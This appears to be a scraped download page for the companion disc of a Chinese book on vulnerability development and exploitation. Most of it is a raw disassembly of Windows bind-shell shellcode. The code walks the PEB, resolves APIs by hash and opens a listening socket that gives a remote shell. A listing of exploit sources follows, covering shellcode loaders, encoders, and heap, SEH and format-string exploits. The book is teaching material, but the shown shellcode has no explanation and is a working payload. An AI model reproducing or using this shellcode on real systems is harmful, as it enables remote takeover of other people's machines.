00401036 . 90 NOP
00401037 . 90 NOP
00401038 . 90 NOP
00401039 . 90 NOP
0040103A . 90 NOP
0040103B . 90 NOP
0040103C . 90 NOP
0040103D . 59 POP ECX
0040103E . 81C9 D3623020 OR ECX,203062D3
00401044 . 41 INC ECX
00401045 . 43 INC EBX
00401046 . 4D DEC EBP
00401047 . 64:99 CDQ ; Superfluous prefix
00401049 . 96 XCHG EAX,ESI
0040104A . 8D7E E8 LEA EDI,DWORD PTR DS:[ESI-18]
0040104D . 64:8B5A 30 MOV EBX,DWORD PTR FS:[EDX+30]
00401051 . 8B4B 0C MOV ECX,DWORD PTR DS:[EBX+C]
00401054 . 8B49 1C MOV ECX,DWORD PTR DS:[ECX+1C]
00401057 . 8B09 MOV ECX,DWORD PTR DS:[ECX]
00401059 . 8B69 08 MOV EBP,DWORD PTR DS:[ECX+8]
0040105C . B6 03 MOV DH,3
0040105E . 2BE2 SUB ESP,EDX
00401060 . 66:BA 3332 MOV DX,3233
00401064 . 52 PUSH EDX
00401065 . 68 7773325F PUSH 5F327377
0040106A . 54 PUSH ESP
0040106B > AC LODS BYTE PTR DS:[ESI]
0040106C . 3C D3 CMP AL,0D3
0040106E . 75 06 JNZ SHORT bindshel.00401076
00401070 . 95 XCHG EAX,EBP
00401071 . FF57 F4 CALL DWORD PTR DS:[EDI-C]
00401074 . 95 XCHG EAX,EBP
00401075 . 57 PUSH EDI
00401076 > 60 PUSHAD
00401077 . 8B45 3C MOV EAX,DWORD PTR SS:[EBP+3C]
0040107A . 8B4C05 78 MOV ECX,DWORD PTR SS:[EBP+EAX+78]
0040107E . 03CD ADD ECX,EBP
00401080 . 8B59 20 MOV EBX,DWORD PTR DS:[ECX+20]
00401083 . 03DD ADD EBX,EBP
00401085 . 33FF XOR EDI,EDI
00401087 > 47 INC EDI
00401088 . 8B34BB MOV ESI,DWORD PTR DS:[EBX+EDI*4]
0040108B . 03F5 ADD ESI,EBP
0040108D . 99 CDQ
0040108E > AC LODS BYTE PTR DS:[ESI]
0040108F . 34 71 XOR AL,71
00401091 . 2AD0 SUB DL,AL
00401093 . 3C 71 CMP AL,71
00401095 .^75 F7 JNZ SHORT bindshel.0040108E
00401097 . 3A5424 1C CMP DL,BYTE PTR SS:[ESP+1C]
0040109B .^75 EA JNZ SHORT bindshel.00401087
0040109D . 8B59 24 MOV EBX,DWORD PTR DS:[ECX+24]
004010A0 . 03DD ADD EBX,EBP
004010A2 . 66:8B3C7B MOV DI,WORD PTR DS:[EBX+EDI*2]
004010A6 . 8B59 1C MOV EBX,DWORD PTR DS:[ECX+1C]
004010A9 . 03DD ADD EBX,EBP
004010AB . 032CBB ADD EBP,DWORD PTR DS:[EBX+EDI*4]
004010AE . 95 XCHG EAX,EBP
004010AF . 5F POP EDI
004010B0 . AB STOS DWORD PTR ES:[EDI]
004010B1 . 57 PUSH EDI
004010B2 . 61 POPAD
004010B3 . 3BF7 CMP ESI,EDI
004010B5 .^75 B4 JNZ SHORT bindshel.0040106B
004010B7 . 5E POP ESI
004010B8 . 54 PUSH ESP
004010B9 . 6A 02 PUSH 2
004010BB . AD LODS DWORD PTR DS:[ESI]
004010BC . FFD0 CALL EAX
004010BE . 8846 13 MOV BYTE PTR DS:[ESI+13],AL
004010C1 . 8D48 30 LEA ECX,DWORD PTR DS:[EAX+30]
004010C4 . 8BFC MOV EDI,ESP
004010C6 . F3:AB REP STOS DWORD PTR ES:[EDI]
004010C8 . 40 INC EAX
004010C9 . 50 PUSH EAX
004010CA . 40 INC EAX
004010CB . 50 PUSH EAX
004010CC . AD LODS DWORD PTR DS:[ESI]
004010CD . FFD0 CALL EAX
004010CF . 95 XCHG EAX,EBP
004010D0 . B8 02FF1A0A MOV EAX,0A1AFF02
004010D5 . 32E4 XOR AH,AH
004010D7 . 50 PUSH EAX
004010D8 . 54 PUSH ESP
004010D9 > 55 PUSH EBP
004010DA . AD LODS DWORD PTR DS:[ESI]
004010DB . FFD0 CALL EAX
004010DD . 85C0 TEST EAX,EAX
004010DF .^74 F8 JE SHORT bindshel.004010D9
004010E1 . FE4424 2D INC BYTE PTR SS:[ESP+2D]
004010E5 . 83EF 6C SUB EDI,6C
004010E8 . AB STOS DWORD PTR ES:[EDI]
004010E9 . AB STOS DWORD PTR ES:[EDI]
004010EA . AB STOS DWORD PTR ES:[EDI]
004010EB . 58 POP EAX
004010EC . 54 PUSH ESP
004010ED . 54 PUSH ESP
004010EE . 50 PUSH EAX
004010EF . 50 PUSH EAX
004010F0 . 50 PUSH EAX
004010F1 . 54 PUSH ESP
004010F2 . 50 PUSH EAX
004010F3 . 50 PUSH EAX
004010F4 . 56 PUSH ESI
004010F5 . 50 PUSH EAX
004010F6 . FF56 E4 CALL DWORD PTR DS:[ESI-1C]
004010F9 . FF56 E8 CALL DWORD PTR DS:[ESI-18]
004010FC . 90 NOP
004010FD . 90 NOP
004010FE . 90 NOP
004010FF . 90 NOP
00401100 . 90 NOP
00401101 . 90 NOP
00401102 . 90 NOP
00401103 . 90 NOP
00401104 . 90 NOP
00401105 . 90 NOP
00401106 . 90 NOP
没有合适的资源?快使用搜索试试~ 我知道了~
《0Day—漏洞开发与利用》光盘
共279个文件
doc:35个
pdb:28个
exe:27个
需积分: 10 14 下载量 68 浏览量
2010-11-11
21:49:10
上传
评论 1
收藏 1.52MB RAR 举报
温馨提示
《0Day-漏洞开发与利用》是一本关于漏洞开发与利用的书,对于漏洞挖掘和利用的爱好者来说是一本很好的入门教材
资源推荐
资源详情
资源评论
收起资源包目录
《0Day—漏洞开发与利用》光盘 (279个子文件)
bindshell_bin 1004B
shellcode_loader.c 8KB
bindshell.c 7KB
heap_PEB.c 5KB
shellcode_popup_general.c 4KB
final_sc.c 3KB
encoder.c 2KB
SEH_heap.c 2KB
SEH_stack.c 2KB
fuzzer.c 2KB
popup_code_simple.c 2KB
fuzzer.c 2KB
stack_overflow_exec.c 1KB
dword_shoot .c 1KB
stack_overflow_ret.c 1KB
heap_debug.c 1KB
stack_overflow_var.c 1KB
decoder.c 1KB
crack_me.c 1KB
stack_show.c 984B
hash.c 919B
fuzzer.c 903B
str_format_3.c 869B
str_format_1.c 774B
str_format_2.c 720B
target_server.cpp 2KB
v_table.cpp 2KB
search_opcode.cpp 2KB
64.doc 11KB
68.doc 11KB
49.doc 11KB
71.doc 11KB
59.doc 11KB
67.doc 11KB
70.doc 11KB
65.doc 11KB
58.doc 11KB
47.doc 11KB
55.doc 11KB
45.doc 11KB
74.doc 11KB
69.doc 11KB
51.doc 11KB
54.doc 11KB
76.doc 11KB
50.doc 11KB
61.doc 11KB
57.doc 11KB
53.doc 11KB
63.doc 11KB
66.doc 11KB
56.doc 11KB
52.doc 11KB
75.doc 11KB
72.doc 11KB
62.doc 11KB
73.doc 11KB
46.doc 11KB
77.doc 11KB
44.doc 11KB
60.doc 11KB
fuzz.doc 11KB
48.doc 11KB
shellcode_popup_general.dsp 4KB
stack_overflow_exec.dsp 3KB
stack_overflow_ret.dsp 3KB
stack_overflow_var.dsp 3KB
popup_code_simple.dsp 3KB
shellcode_loader.dsp 3KB
target_server.dsp 3KB
search_opcode.dsp 3KB
dword_shoot .dsp 3KB
str_format_2.dsp 3KB
str_format_1.dsp 3KB
str_format_3.dsp 3KB
stack_show.dsp 3KB
heap_debug.dsp 3KB
bindshell.dsp 3KB
SEH_stack.dsp 3KB
crack_me.dsp 3KB
final_sc.dsp 3KB
SEH_heap.dsp 3KB
heap_PEB.dsp 3KB
v_table.dsp 3KB
decoder.dsp 3KB
encoder.dsp 3KB
hash.dsp 3KB
shellcode_popup_general.dsw 569B
stack_overflow_exec.dsw 561B
stack_overflow_var.dsw 559B
stack_overflow_ret.dsw 559B
popup_code_simple.dsw 559B
shellcode_loader.dsw 555B
target_server.dsw 551B
search_opcode.dsw 551B
str_format_3.dsw 549B
str_format_1.dsw 549B
str_format_2.dsw 549B
dword_shoot .dsw 549B
heap_debug.dsw 545B
共 279 条
- 1
- 2
- 3
资源评论
qiaoxuliang
- 粉丝: 2
- 资源: 5
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功